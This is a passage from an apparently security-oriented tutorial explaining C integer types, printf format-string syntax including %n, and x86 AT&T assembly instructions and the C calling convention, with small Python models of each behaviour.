- int[# of bits]_t
- int8_t, int16_t, int32_t
- uint[# of bits]_t
- uint8_t, uint16_t, uint32_t
- Signed integers
- Unsigned integers
More information can be found in stdint.h and limits.h:
man stdint.h
cat /usr/include/stdint.h
man limits.h
cat /usr/include/limits.h
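Knowing the signedness and size of integers is useful; integer overflow is covered in a later chapter.
Formatted Output Functions
The C standard defines the following formatted output functions (see man 3 printf):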
#include <stdio.h>
int printf(const char *format, ...);
int fprintf(FILE *stream, const char *format, ...);
int dprintf(int fd, const char *format, ...);
int sprintf(char *str, const char *format, ...);
int snprintf(char *str, size_t size, const char *format, ...);
#include <stdarg.h>
int vprintf(const char *format, va_list ap);
int vfprintf(FILE *stream, const char *format, va_list ap);
int vdprintf(int fd, const char *format, va_list ap);
int vsprintf(char *str, const char *format, va_list ap);
int vsnprintf(char *str, size_t size, const char *format, va_list ap);
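fprintf() writes output to a stream according to the format string. Its three arguments are the stream, the format string, and the variable argument list. printf() is equivalent to fprintf() but assumes the output stream is stdout. sprintf() is equivalent to fprintf() except that the output is written to an array rather than a stream; a null character is appended to the end of the written string. snprintf() is equivalent to sprintf() but specifies the maximum number of characters that can be written, size. When size is greater than zero, output characters beyond the first size-1 are discarded rather than written to the array, and a null character is appended to the string written to the array. dprintf() is equivalent to fprintf() except that it writes to a file descriptor fd rather than a stream. vfprintf(), vprintf(), vsprintf(), vsnprintf(), and vdprintf() correspond to the functions above, except that they take a va_list argument in place of the variable argument list.
Format Strings
A format string is a sequence of characters made up of ordinary characters (anything other than %) and conversion specifications. Ordinary characters are copied unchanged to the output stream. Each conversion specification converts its corresponding argument according to the conversion specifier and writes the result to the output stream.
A conversion specification consists of optional parts and a required part:
%[parameter][flags][width][.precision][length]conversion specifier
- (Required) Conversion specifier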
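Character | Description |
---|---|
d , i | Signed decimal int. '%d' and '%i' are synonymous for output, but differ for scanf() input, where %i interprets a value with a 0x or 0 prefix as hexadecimal or octal respectively. If a precision is given, the output is padded on the left with 0 when there are too few digits. The default precision is 1. With a precision of 0 and a value of 0, the output is empty |
u | Decimal unsigned int. If a precision is given, the output is padded on the left with 0 when there are too few digits. The default precision is 1. With a precision of 0 and a value of 0, the output is empty |
f , F | double printed in decimal fixed-point notation. 'f' and 'F' differ in how infinity and NaN are shown: 'f' prints 'inf', 'infinity', and 'nan'; 'F' prints 'INF', 'INFINITY', and 'NAN'. The number of digits after the decimal point equals the precision, and the last digit is rounded. The default precision is 6. If the precision is 0 and the # flag is absent, no decimal point appears. There is at least one digit to the left of the decimal point |
e , E | double printed in the decimal form [-]d.ddd e[+/-]ddd. The E version uses E (rather than e) for the exponent. The exponent contains at least 2 digits; if the value is 0, the exponent is 00. On Windows the exponent has at least 3 digits, for example 1.5e002, which can be changed with the Microsoft runtime function _set_output_format. There is 1 digit before the decimal point. The number of digits after the decimal point equals the precision. The default precision is 6. If the precision is 0 and the # flag is absent, no decimal point appears |
g , G | double, with the precision defined as the total number of significant digits. When the exponent lies in the interval [-4, precision), the output uses fixed-point form; otherwise it uses exponential form. 'g' uses lowercase letters and 'G' uses uppercase letters. Trailing zeros to the right of the decimal point are not shown, and the decimal point is shown only when the fractional part is non-zero |
x , X | Hexadecimal unsigned int. 'x' uses lowercase letters and 'X' uses uppercase letters. If a precision is given, the output is padded on the left with 0 when there are too few digits. The default precision is 1. With a precision of 0 and a value of 0, the output is empty |
o | Octal unsigned int. If a precision is given, the output is padded on the left with 0 when there are too few digits. The default precision is 1. With a precision of 0 and a value of 0, the output is empty |
s | Without the l flag, prints a null-terminated string up to the limit given by the precision; if no precision is given, all bytes are printed. With the l flag, the argument points to an array of wchar_t, and each wide character is converted to a multibyte character on output, as if by calling wcrtomb |
c | Without the l flag, the int argument is converted to unsigned char and printed. With the l flag, the wint_t argument is converted to a two-element wchar_t array whose first element holds the character to print and whose second element is the null wide character |
p | void * type; prints the value of the corresponding variable. printf("%p", a) prints the value of a in address format, and printf("%p", &a) prints the address where a is stored |
a , A | Hexadecimal representation of a double, "[−]0xh.hhhh p±d", where the exponent is written in decimal. For example, 1025.010 is printed as 0x1.004000p+10. 'a' uses lowercase letters and 'A' uses uppercase letters |
n | Prints nothing, but writes the number of characters successfully output so far into the variable pointed to by the corresponding integer pointer argument |
% | A literal '%'; accepts no part other than the parameter |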
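- (Optional) Parameter
Character | Description |
---|---|
n$ | n is the index of the argument this format specifier displays. This allows an argument to be output several times, by several format specifiers, and in a different order. If any placeholder uses a parameter, all other placeholders must use one too. Example: printf("%2$d %2$#x; %1$d %1$#x",16,17) produces "17 0x11; 16 0x10" |
- (Optional) Flags
Character | Description |
---|---|
+ | Always show the '+' or '-' sign of a signed value; by default the sign of positive numbers is omitted. Applies to numeric types only |
space | Prefix the output of a signed number with 1 space if it has no sign or outputs 0 characters. If space and '+' both appear, the space flag is ignored |
- | Left-justify. The default is right-justified |
# | For 'g' and 'G', trailing zeros are not removed, to show the precision. For 'f', 'F', 'e', 'E', 'g', and 'G', the decimal point is always printed. For 'o', 'x', and 'X', the prefix 0, 0x, or 0X respectively is printed before non-zero values to indicate the base |
0 | If the width option is prefixed with 0, pad on the left with 0 up to the required width. For example, printf("%2d", 3) prints " 3", while printf("%02d", 3) prints "03". If both 0 and - appear, 0 is ignored, i.e. left-justified output is still padded with spaces |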
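- (Optional) Width
A non-negative decimal integer giving the minimum number of characters to output. If the value needs more characters than the width, it is printed in full; if it needs fewer, it is padded with spaces or 0.
- (Optional) Precision
The precision is a non-negative decimal integer giving the number of characters to print, the number of decimal places, or the number of significant digits. For the integer conversions d, i, u, x, and o, it is the minimum number of digits: missing digits are filled with 0 on the left, longer values are not truncated, and the default is 1. For the floating-point conversions a, A, e, E, f, and F, it is the number of digits shown to the right of the decimal point, rounded where necessary; the default is 6. For the floating-point conversions g and G, it is the maximum number of significant digits. For the string conversion s, it is the upper limit on the number of bytes output; characters beyond the limit are truncated. If the precision is given as *, its value is taken from the corresponding function argument. If only the decimal point is given, the precision is 0.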
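- (Optional) Length
Character | Description |
---|---|
hh | For integer types, printf expects an int argument promoted from char |
h | For integer types, printf expects an int argument promoted from short |
l | For integer types, printf expects a long argument. For floating-point types, printf expects a double argument. For the string conversion s, printf expects a wchar_t pointer argument. For the character conversion c, printf expects a wint_t argument |
ll | For integer types, printf expects a long long argument. Microsoft also accepts I64 |
L | For floating-point types, printf expects a long double argument |
z | For integer types, printf expects a size_t argument |
j | For integer types, printf expects an intmax_t argument |
t | For integer types, printf expects a ptrdiff_t argument |
Examples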
printf("Hello %%"); // "Hello %"
printf("Hello World!"); // "Hello World!"
printf("Number: %d", 123); // "Number: 123"
printf("%s %s", "Format", "Strings"); // "Format Strings"
printf("%12c", 'A'); // "           A" (11 spaces, then A)
printf("%16s", "Hello!"); // "          Hello!" (10 spaces, then Hello!)
int n;
printf("%12c%n", 'A', &n); // n = 12
printf("%16s%n", "Hello!", &n); // n = 16
printf("%2$s %1$s", "Format", "Strings"); // "Strings Format"
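printf("%42c%1$n", &n); // first prints 41 spaces, then the low 8 bits of n's address as a single character
We now have a detailed picture of the formatted output functions and format strings; format string vulnerabilities are covered in a later chapter.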
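The width and flag rules are easy to experiment with outside C. The sketch below uses Python's % operator, which follows many of the same conversions but is not printf: it has no %n and no n$ parameters. The helper `emulate_percent_n` is an invented name, and it approximates what a trailing %n would store by taking the length of the formatted output.

```python
def emulate_percent_n(fmt, *args):
    """Return (output, count), where count is what a trailing %n would store."""
    out = fmt % args
    return out, len(out)

print(emulate_percent_n("%12c", "A"))        # 11 spaces + 'A', count 12
print(emulate_percent_n("%16s", "Hello!"))   # 10 spaces + 'Hello!', count 16

# A few flags from the tables above.
print("%05d" % 42)      # zero padding up to width 5
print("%-4d|" % 3)      # left-justified inside width 4
print("%#x" % 255)      # base prefix
print("%+d" % 5)        # forced sign
print("%.3f" % 3.14159) # 3 digits after the decimal point
```

The count depends only on how many characters were produced, so a width field lets a format string choose the value that %n writes; this is the property that format string exploits rely on.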
Assembly Language
- Assembly Language
- 3.3 x86 Assembly Basics
- 3.3.2 Registers
- 3.3.3 Memory and Addressing Modes
- 3.3.4 Instructions
- 3.3.5 Calling Convention
- 3.4 x64 Assembly Basics
- 3.4.1 Introduction
- 3.4.2 Registers
- 3.4.3 Addressing Modes
- 3.4.4 Common Instructions
- 3.5 ARM Assembly Basics
- 3.6 MIPS Assembly Basics
3.3 x86 Assembly Basics
3.3.2 Registers
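Modern x86 processors (386 and later) have 8 32-bit general-purpose registers, as shown in Figure 1.
The register names are mostly historical. For example, EAX used to be called the accumulator because it was used for many arithmetic operations, and ECX was known as the counter because it was used to hold a loop index (the loop count). Although most of the registers have lost their special purposes in the modern instruction set, by convention two of them are still reserved for special purposes: ESP and EBP.
The EAX, EBX, ECX, and EDX registers can be used in sections. For example, the lowest 2 bytes of EAX can be treated as a 16-bit register (AX). The lowest byte of AX can be used as an 8-bit register (AL), and the high byte of AX can likewise be used as an 8-bit register (AH). These names refer to the same physical register: when a two-byte value is placed in DX, the contents of DH, DL, and EDX are all affected. These "sub-registers" are mainly holdovers from the older 16-bit version of the instruction set. They are still sometimes convenient when handling data smaller than 32 bits, such as 1-byte ASCII characters.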
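Since the sub-registers are just views onto the same 32 bits, they can be modelled with masks and shifts. This is a sketch with made-up helper names, not a description of how the hardware is built.

```python
def ax(eax):
    """Low 16 bits of EAX."""
    return eax & 0xFFFF

def al(eax):
    """Low 8 bits of EAX."""
    return eax & 0xFF

def ah(eax):
    """Bits 8 to 15 of EAX, i.e. the high byte of AX."""
    return (eax >> 8) & 0xFF

def write_dx(edx, value):
    """Writing DX replaces the low 16 bits of EDX and keeps the upper 16 bits."""
    return (edx & 0xFFFF0000) | (value & 0xFFFF)

eax = 0x12345678
print(hex(ax(eax)), hex(ah(eax)), hex(al(eax)))  # 0x5678 0x56 0x78
print(hex(write_dx(0xAABBCCDD, 0x1122)))         # 0xaabb1122
```

After the write to DX, reading DH and DL gives 0x11 and 0x22, which is the "all affected" behaviour described above.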
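3.3.3 Memory and Addressing Modes
3.3.3.1 Declaring Static Data Regions
You can declare static data regions (analogous to global variables) in memory using special x86 assembler directives. The .data directive introduces data declarations. Following this directive, .byte, .short, and .long can be used to declare 1-byte, 2-byte, and 4-byte data respectively. Declared data can be labeled so that its address can be referenced. Labels are very useful in assembly language: they give names to memory addresses, which the assembler and linker later translate into machine code the computer understands. This is similar to declaring variables by name, but it follows some lower-level rules. For example, locations declared in sequence are stored next to each other in memory.
Some examples:
.data
var :
.byte 64 ;declare a byte, labeled var, containing the value 64
.byte 10 ;declare a byte with no label containing the value 10; its address is var+1
x :
.short 42 ;declare a 2-byte value, labeled x, initialized to 42
y :
.long 30000 ;declare a 4-byte value, labeled y, initialized to 30000
Unlike in high-level languages, where arrays can have many dimensions and are accessed by index, arrays in x86 assembly are simply a number of "cells" located contiguously in memory. An array can be declared just by listing the values, as in the first example below. For the special case of an array of bytes, string literals can be used. To fill a region of memory with zeros, use the .zero directive.
Examples:
s :
.long 1, 2, 3 ;declare three 4-byte values 1, 2, and 3; the value at location s+8 is 3
barr:
.zero 10 ;declare 10 bytes starting at location barr, initialized to 0
str :
.string "hello" ;declare 6 bytes starting at location str: the ASCII values of hello followed by a nul (0) byte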
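3.3.3.2 Addressing Memory
Modern x86-compatible processors can address up to 2^32 bytes of memory: memory addresses are 32 bits wide. In the examples above, where we used labels to refer to memory regions, the assembler actually replaces those labels with 32-bit quantities that specify addresses in memory. In addition to supporting references to memory regions by label (i.e. constant values), the x86 provides a flexible scheme for computing and referring to memory addresses: up to two 32-bit registers and a 32-bit signed constant can be added together to compute a memory address. One of the registers can optionally be pre-multiplied by 2, 4, or 8.
Addressing modes can be used with many x86 instructions (described in the next section). Here we illustrate them with the mov instruction, which moves data between registers and memory. This instruction has two operands: the first is the source and the second is the destination.
Some examples of mov:
mov (%ebx), %eax ;load 4 bytes from the memory address in EBX into EAX
;unless noted otherwise, (%ebx) below means the memory location whose address is held in EBX
mov %ebx, var(,1) ;move the 4 bytes in EBX into memory at address var (var is a 32-bit constant)
mov (%esi, %ebx, 4), %edx ;move the 4 bytes of data at address ESI+4*EBX into EDX
Some invalid examples:
mov (%ebx, %ecx, -1), %eax ;register values can only be added; the scale must be 1, 2, 4, or 8
mov %ebx,(%eax, %esi, %edi, 1) ;at most 2 registers may appear in an address computation, but 3 appear here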
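The address computed by an operand of the form disp(base, index, scale) can be written as one formula. The sketch below assumes 32-bit addresses; `effective_address` is a name chosen for illustration, and rejecting other scales mirrors the first invalid example above.

```python
def effective_address(base=0, index=0, scale=1, disp=0):
    """Address of the AT&T operand disp(base, index, scale) on 32-bit x86."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("scale must be 1, 2, 4, or 8")
    return (base + index * scale + disp) & 0xFFFFFFFF

# (%esi, %ebx, 4) with ESI = 0x1000 and EBX = 3
print(hex(effective_address(base=0x1000, index=3, scale=4)))  # 0x100c
# -4(%ebp) with EBP = 0x2000
print(hex(effective_address(base=0x2000, disp=-4)))           # 0x1ffc
```

With a scale of 4 the index register steps through an array of 4-byte elements, which is how compilers usually translate array[i] for an int array.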
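3.3.3.3 Operation Suffixes
In general, the intended size of the data item at a given memory address can be inferred from the instruction that references it. For example, in all of the instructions above, the size of the memory region can be inferred from the size of the register operand. When we load a 32-bit register, the assembler can infer that the memory region is 4 bytes wide. When we store the value of a 1-byte register to memory, the assembler can infer that we want a single byte of memory.
In some cases, however, the size of the referenced memory region is ambiguous. Consider the instruction mov $2,(%ebx). Should it move the value 2 into the single byte at the address in EBX? Or should it move the 32-bit integer representation of 2 into the 4 bytes starting at the address in EBX? Since either is a valid interpretation, the assembler must be told explicitly which is meant. The size suffixes b, w, and l serve this purpose, indicating sizes of 1, 2, and 4 bytes respectively.
Some examples:
movb $2, (%ebx) ;move 2 into the single byte at the address held in EBX
movw $2, (%ebx) ;move the 16-bit integer 2 into the 2 bytes starting at the address held in EBX
movl $2,(%ebx) ;move the 32-bit integer 2 into the 4 bytes starting at the address held in EBX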
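3.3.4 Instructions
Machine instructions generally fall into 3 categories: data movement, arithmetic/logic, and control flow. This section looks at important examples of x86 instructions from each category. It is not an exhaustive list; for a complete list, see Intel's instruction set reference.
We use the following notation:
<reg32> any 32-bit register (%eax, %ebx, %ecx, %edx, %esi, %edi, %esp, or %ebp)
<reg16> any 16-bit register (%ax, %bx, %cx, or %dx)
<reg8> any 8-bit register (%ah, %al, %bh, %bl, %ch, %cl, %dh, %dl)
<reg> any register
<mem> a memory address, e.g. (%eax), 4+var, (%eax, %ebx, 1)
<con32> any 32-bit constant
<con16> any 16-bit constant
<con8> any 8-bit constant
<con> any 32-, 16-, or 8-bit constant
In assembly language, all labels and numeric constants used as immediate operands (i.e. not in an address calculation such as 3(%eax, %ebx, 8)) are always prefixed by a dollar sign $. When needed, hexadecimal notation can be used with the 0x prefix, e.g. $0xABC. Without the prefix, numbers are interpreted as decimal.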
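3.3.4.1 Data Movement Instructions
mov
Move
The mov instruction copies the data item referred to by its first operand (register contents, memory contents, or a constant value) into the location referred to by its second operand (a register or memory). While register-to-register moves are possible, direct memory-to-memory moves are not. To transfer data between memory locations, the source memory contents must first be loaded into a register and then stored to the destination memory address.
- Syntax
mov <reg>, <reg>
mov <reg>, <mem>
mov <mem>, <reg>
mov <con>, <reg>
mov <con>, <mem>
- Examples
mov %ebx, %eax ;copy the value in EBX into EAX
movb $5, var(,1) ;store the value 5 into the byte at location var
push
Push onto the stack
The push instruction places its operand on top of the hardware-supported stack in memory. Specifically, push first decrements ESP by 4 and then places its operand into the 32-bit location at address (%esp). ESP (the stack pointer) is decremented by every push because the x86 stack grows down, i.e. from high addresses to lower addresses.
- Syntax
push <reg32>
push <mem>
push <con32>
- Examples
push %eax ;push EAX onto the stack
push var(,1) ;push the 4 bytes at address var onto the stack
pop
Pop from the stack
The pop instruction removes the 4-byte data element from the top of the hardware-supported stack and places it into the specified operand (a register or memory location). It first moves the 4 bytes at memory location (%esp) into the specified register or memory location and then increments ESP by 4.
- Syntax
pop <reg32>
pop <mem>
- Examples
pop %edi ;pop the top element of the stack into EDI
pop (%ebx) ;pop the top element of the stack into the 4 bytes of memory starting at the address in EBX
Key point: the stack. The stack is a special storage area whose distinguishing feature is its access pattern: the data that entered most recently leaves first, i.e. "last in, first out".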
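The effect of push and pop on ESP can be traced with a small model. This is a sketch only: the `Stack32` class and the starting ESP value of 0x1000 are assumptions made for illustration.

```python
class Stack32:
    """Toy model of the 32-bit x86 stack: it grows toward lower addresses."""

    def __init__(self, esp=0x1000):
        self.esp = esp      # hypothetical initial stack pointer
        self.mem = {}       # address -> 32-bit value

    def push(self, value):
        self.esp -= 4                          # first decrement ESP by 4
        self.mem[self.esp] = value & 0xFFFFFFFF  # then store at (%esp)

    def pop(self):
        value = self.mem[self.esp]             # first read from (%esp)
        self.esp += 4                          # then increment ESP by 4
        return value

stack = Stack32()
stack.push(0x11111111)
stack.push(0x22222222)
print(hex(stack.esp))    # 0xff8
print(hex(stack.pop()))  # 0x22222222, the last value pushed comes out first
```

Note that pop only moves ESP; the old value is still sitting in memory below the stack pointer until something overwrites it, which is why stale data can often be found there while debugging.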
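lea
Load effective address
The lea instruction places the address specified by its first operand into the register specified by its second operand. Note that the contents of the memory location are not loaded; only the effective address is computed and placed into the register. This is useful for obtaining a pointer into a memory region or for performing simple arithmetic.
The difference between lea and mov can be put more plainly (the following examples use Intel syntax). MOV transfers data: for example, MOV AX,[1000H] uses 1000H as an offset address, locates the memory cell, and copies the data in that cell into AX. LEA takes the offset address: for example, LEA AX,[1000H] copies the offset address 1000H of the source operand [1000H] into AX. You can read it as if the brackets were removed, equivalent to MOV AX,1000H. Likewise, LEA BX,[AX] is equivalent to MOV BX,AX, and LEA BX,TABLE is equivalent to MOV BX,OFFSET TABLE. Sometimes MOV cannot be substituted directly: LEA AX,[SI+6] cannot be replaced by MOV AX,SI+6, but it can be replaced by the two steps MOV AX,SI and ADD AX,6.
- Syntax
lea <mem>, <reg32>
- Examples
lea (%ebx,%esi,8), %edi ;the value EBX+8*ESI is placed in EDI
lea val(,1), %eax ;the value val is placed in EAX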
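3.3.4.2 Arithmetic and Logic Instructions
add
Integer addition
The add instruction adds its two operands and stores the result in its second operand. Both operands may be registers, but at most one operand may be a memory location.
- Syntax
add <reg>, <reg>
add <mem>, <reg>
add <reg>, <mem>
add <con>, <reg>
add <con>, <mem>
- Examples
add $10, %eax ;EAX is set to EAX+10
addb $10, (%eax) ;add 10 to the single byte stored at the memory address in EAX
sub
Integer subtraction
The sub instruction subtracts the value of its first operand from the value of its second operand and stores the result in its second operand. As with add, both operands may be registers, but at most one may be a memory location.
- Syntax
sub <reg>, <reg>
sub <mem>, <reg>
sub <con>, <reg>
sub <con>, <mem>
- Examples
sub %ah, %al ;AL is set to AL-AH
sub $216, %eax ;subtract 216 from the value in EAX
inc, dec
Increment, decrement
The inc instruction adds 1 to its operand, and the dec instruction subtracts 1 from its operand.
- Syntax
inc <reg>
inc <mem>
dec <reg>
dec <mem>
- Examples
dec %eax ;subtract 1 from the value in EAX
incl var(,1) ;add 1 to the 32-bit integer stored at location var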
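imul
Integer multiplication
The imul instruction has two basic formats: a two-operand form (the first two syntax lines below) and a three-operand form (the last two syntax lines below).
The two-operand form multiplies its two operands together and stores the result in the second operand. The result (i.e. second) operand must be a register.
The three-operand form multiplies its first and second operands together and stores the result in its third operand, which must be a register. Furthermore, the first operand must be a constant.
- Syntax
imul <reg32>, <reg32>
imul <mem>, <reg32>
imul <con>, <reg32>, <reg32>
imul <con>, <mem>, <reg32>
- Examples
imul (%ebx), %eax ;multiply the 32-bit integer in EAX by the value in memory at the address in EBX, and store the result in EAX
imul $25, %edi, %esi ;ESI is set to EDI * 25
idiv
Integer division
idiv takes a single operand, the divisor. The dividend is the 64-bit integer in EDX:EAX. The quotient is stored in EAX and the remainder in EDX.
- Syntax
idiv <reg32>
idiv <mem>
- Examples
idiv %ebx ;divide EDX:EAX by the value in EBX; the quotient goes in EAX and the remainder in EDX
idivl (%ebx) ;divide EDX:EAX by the 32-bit value stored at the memory address in EBX; the quotient goes in EAX and the remainder in EDX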
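The way idiv combines EDX and EAX into one dividend is easier to follow with numbers. The sketch below models the 32-bit form under the usual x86 rules (signed operands, quotient truncated toward zero, remainder with the sign of the dividend); `idiv32` and `to_signed` are illustrative names, and the Python exceptions stand in for the processor's divide error.

```python
MASK32 = 0xFFFFFFFF

def to_signed(value, bits):
    value &= (1 << bits) - 1
    return value - (1 << bits) if value >> (bits - 1) else value

def idiv32(edx, eax, divisor):
    """Model of `idiv <reg32>`: returns the new (EAX, EDX) = (quotient, remainder)."""
    dividend = to_signed((edx << 32) | (eax & MASK32), 64)
    divisor = to_signed(divisor, 32)
    if divisor == 0:
        raise ZeroDivisionError("divide error: divisor is zero")
    # Python's // rounds toward negative infinity, so divide magnitudes instead.
    quotient = abs(dividend) // abs(divisor)
    if (dividend < 0) != (divisor < 0):
        quotient = -quotient
    remainder = dividend - quotient * divisor
    if not -(1 << 31) <= quotient < (1 << 31):
        raise OverflowError("divide error: quotient does not fit in EAX")
    return quotient & MASK32, remainder & MASK32

print(idiv32(0, 7, 2))                             # (3, 1)
print([hex(v) for v in idiv32(0xFFFFFFFF, 0xFFFFFFF9, 2)])  # -7 / 2 -> -3 rem -1
```

The second call shows why EDX must be sign-extended from EAX before dividing a negative 32-bit number (the cdq instruction does this): leaving EDX at 0 would make the dividend a large positive value instead of -7.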
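and, or, xor
Bitwise logical and, or, and exclusive or
These instructions perform the specified bitwise logical operation on their operands and store the result in the second operand.
- Syntax
and <reg>, <reg>
and <mem>, <reg>
and <reg>, <mem>
and <con>, <reg>
and <con>, <mem>
or <reg>, <reg>
or <mem>, <reg>
or <reg>, <mem>
or <con>, <reg>
or <con>, <mem>
xor <reg>, <reg>
xor <mem>, <reg>
xor <reg>, <mem>
xor <con>, <reg>
xor <con>, <mem>
- Examples
and $0x0F, %eax ;keep only the lowest 4 bits of EAX
xor %edx, %edx ;set the contents of EDX to zero
not
Bitwise logical not
Logically negates the operand, i.e. flips every bit in the operand.
- Syntax
not <reg>
not <mem>
- Examples
not %eax ;flip all the bits of EAX
neg
Negate
Computes the two's complement negation of the operand.
- Syntax
neg <reg>
neg <mem>
- Examples
neg %eax ;EAX → -EAX
shl, shr
Shift left and shift right
These instructions shift the bits of their second operand left or right by the number of positions given in the first operand, filling the vacated bit positions with 0. An operand can be shifted by up to 31 places. The shift count can be either an 8-bit constant or the register CL. In either case, shift counts greater than 31 are taken modulo 32.
- Syntax
shl <con8>, <reg>
shl <con8>, <mem>
shl %cl, <reg>
shl %cl, <mem>
shr <con8>, <reg>
shr <con8>, <mem>
shr %cl, <reg>
shr %cl, <mem>
- Examples
shl $1, %eax ;multiply the value of EAX by 2 (if the most significant bit is 0)
shr %cl, %ebx ;divide the value of EBX by 2^n, where n is the value in CL, and store the result in EBX
Why does shifting a number's binary representation by 1 bit multiply it by 2? The results of these bit operations follow from how computers represent numbers; see the appendix on number representation at the end of this chapter.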
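A quick model shows both the multiply-by-two effect and the modulo-32 rule for the shift count. The helper names `shl32` and `shr32` are invented for this sketch, which covers 32-bit operands only and ignores the flags.

```python
MASK32 = 0xFFFFFFFF

def shl32(value, count):
    """Logical left shift of a 32-bit value; the count is taken modulo 32."""
    return (value << (count & 31)) & MASK32

def shr32(value, count):
    """Logical right shift of a 32-bit value; the count is taken modulo 32."""
    return (value & MASK32) >> (count & 31)

print(shl32(3, 1))                # 6: each left shift doubles the value
print(shr32(40, 3))               # 5: 40 divided by 2**3
print(hex(shl32(0x80000001, 1)))  # 0x2: the top bit is shifted out and lost
print(shl32(1, 33))               # 2: a count of 33 behaves like a count of 1
```

Each binary digit is worth twice the digit to its right, so moving every digit one place left doubles the number, exactly as appending a 0 multiplies a decimal number by 10.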
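3.3.4.3 Control Flow Instructions
The x86 processor maintains an instruction pointer register (EIP), a 32-bit register that indicates the location in memory of the instruction being executed: the machine code stored at the location it points to is what the program runs. Normally it points to the next instruction the program will execute. The EIP register cannot be manipulated directly; it is updated implicitly by the control flow instructions.
We use the notation <label> to refer to labeled locations in the program text. Labels can be inserted anywhere in x86 assembly code text by entering a label name followed by a colon. For example:
mov 8(%ebp), %esi
begin:
xor %ecx, %ecx
mov (%esi), %eax
The second instruction in this code fragment is labeled begin. Elsewhere in the code, we can refer to the memory location of this instruction using the more convenient symbolic name begin. The label is just a convenient way of expressing the location instead of its 32-bit value.
jmp
Jump
Transfers program control flow to the instruction at the memory location indicated by the operand.
- Syntax
jmp <label>
- Examples
jmp begin ;jump to the instruction labeled begin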
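jcondition
Conditional jump
These instructions are conditional jumps based on the state of a set of condition codes stored in a special register called the machine status word. The machine status word contains information about the last arithmetic operation performed. For example, one bit of this word indicates whether the last result was 0, and another indicates whether the last result was negative. A number of conditional jumps can be performed based on these condition codes. For example, the jz instruction jumps to the specified operand label if the result of the last arithmetic operation was 0. Otherwise, control proceeds to the next instruction in sequence.
Many of the conditional branches have names that are intuitive in terms of the last operation being a special compare instruction, cmp (see below). For example, conditional branches such as jle and jne assume that a cmp operation has just been performed on the operands of interest.
- Syntax
je <label> ;jump when equal
jne <label> ;jump when not equal
jz <label> ;jump when the last result was 0
jg <label> ;jump when greater than
jge <label> ;jump when greater than or equal to
jl <label> ;jump when less than
jle <label> ;jump when less than or equal to
- Examples
cmp %ebx, %eax
jle done
;if the value in EAX is less than or equal to the value in EBX, jump to the label done; otherwise continue to the next instruction
cmp
Compare
Compares the values of the two operands and sets the condition codes in the machine status word accordingly. This instruction is equivalent to sub, except that the result of the subtraction is discarded instead of replacing an operand.
- Syntax
cmp <reg>, <reg>
cmp <mem>, <reg>
cmp <reg>, <mem>
cmp <con>, <reg>
- Examples
cmpb $10, (%ebx)
je loop
;if the byte stored at the memory address in EBX equals the integer constant 10, jump to the label loop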
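call, ret
Subroutine call and return
These instructions implement a subroutine call and return. The call instruction first pushes the current code location onto the hardware-supported stack in memory (see the push instruction) and then performs an unconditional jump to the code location indicated by the label operand. Unlike the simple jmp instruction, call saves the location to return to when the subroutine completes.
The ret instruction implements a subroutine return. It first pops a code location off the stack (see the pop instruction) and then performs an unconditional jump to the retrieved code location.
- Syntax
call <label>
ret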
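3.3.5 Calling Convention
To allow separate programmers to share code and libraries, and to simplify the use of subroutines in general, programmers typically follow a common calling convention. A calling convention is a protocol for how to call and return from routines. For example, given a set of calling convention rules, a programmer does not need to examine the definition of a subroutine to determine how parameters should be passed to it. Furthermore, given a set of calling convention rules, high-level language compilers can be made to follow them, allowing hand-coded assembly routines and high-level language routines to call one another.
We describe the widely used C language calling convention. Following it allows you to write assembly subroutines that can be safely called from C (and C++) code, and also lets you call C library functions from your assembly code.
The C calling convention relies heavily on the hardware-supported stack. It is based on the push, pop, call, and ret instructions. Subroutine parameters are passed on the stack. Registers are saved on the stack, and local variables used by subroutines are placed on the stack. The vast majority of high-level procedural languages implemented on most processors use similar calling conventions.
The calling convention is divided into two sets of rules. The first set is for the caller of the subroutine, and the second is for the writer of the subroutine, the callee. It should be emphasized that mistakes in following these rules quickly lead to fatal program errors, since the stack is left in an inconsistent state; take care when implementing the calling convention in your own subroutines.
A good way to visualize the calling convention is to draw the contents of the nearby region of the stack during subroutine execution. Figure 2 depicts the contents of the stack during the execution of a subroutine with three parameters and three local variables. The cells depicted in the stack are 32-bit memory locations, so their memory addresses are 4 bytes apart. The first parameter resides at an offset of 8 bytes from the base pointer. Above the parameters on the stack (and below the base pointer), the call instruction placed the return address, leading to an extra 4 bytes of offset from the base pointer to the first parameter. When the ret instruction is used to return from the subroutine, it jumps to the return address stored on the stack.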
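3.3.5.1 Caller Rules
To make a subroutine call, the caller should:
- Before calling a subroutine, save the contents of the registers designated caller-saved. The caller-saved registers are EAX, ECX, and EDX. Since the called subroutine is allowed to modify these registers, if the caller relies on their values after the subroutine returns, it must push them onto the stack so that they can be restored after the subroutine returns.
- To pass parameters to the subroutine, push them onto the stack before the call. The parameters should be pushed in reverse order, i.e. last parameter first. Since the stack grows down, the first parameter is stored at the lowest address. Historically, this inversion of parameters was used to allow functions to be passed a variable number of parameters.
- To call the subroutine, use the call instruction. This instruction places the return address on top of the parameters on the stack and branches to the subroutine code, which should follow the callee rules below.
After the subroutine returns (immediately following the call instruction), the caller can expect to find the return value of the subroutine in the register EAX. To restore the machine state, the caller should:
- Remove the parameters from the stack. This restores the stack to its state before the call was performed.
- Restore the contents of the caller-saved registers (EAX, ECX, EDX) by popping them off the stack. The caller can assume that no other registers were modified by the subroutine.
- Example
The code below shows a function call that follows the caller rules. The caller is calling a function myFunc that takes three integer parameters. The first parameter is in EAX, the second parameter is the constant 216, and the third parameter is in the memory location whose address is stored in EBX.
push (%ebx) ;push the last parameter first
push $216 ;push the second parameter
push %eax ;push the first parameter last
call myFunc ;call the function (assume C naming)
add $12, %esp
Note that after the call returns, the caller cleans up the stack using the add instruction. We have 12 bytes on the stack (3 parameters of 4 bytes each), and the stack grows down. Thus, to get rid of the parameters, we can simply add 12 to the stack pointer.
The result produced by myFunc is now available in register EAX. The values of the caller-saved registers (ECX and EDX) may have been changed. If the caller uses them after the call, it needs to save them on the stack before the call and restore them afterwards.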
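3.3.5.2 Callee Rules
The definition of the subroutine should adhere to the following rules at the beginning of the subroutine:
- 1. Push the value of EBP onto the stack, and then copy the value of ESP into EBP using the following instructions:
push %ebp
mov %esp, %ebp
This initial action preserves the base pointer EBP. By convention, the base pointer is used as a point of reference for finding parameters and local variables on the stack. While a subroutine is executing, the base pointer holds a copy of the stack pointer value from when the subroutine started executing. Parameters and local variables are always located at known, constant offsets from the base pointer value. We push the old base pointer value at the beginning of the subroutine so that we can later restore the appropriate base pointer value for the caller when the subroutine returns. Remember, the caller does not expect the subroutine to change the value of the base pointer. We then move the stack pointer into EBP to obtain our point of reference for accessing parameters and local variables.
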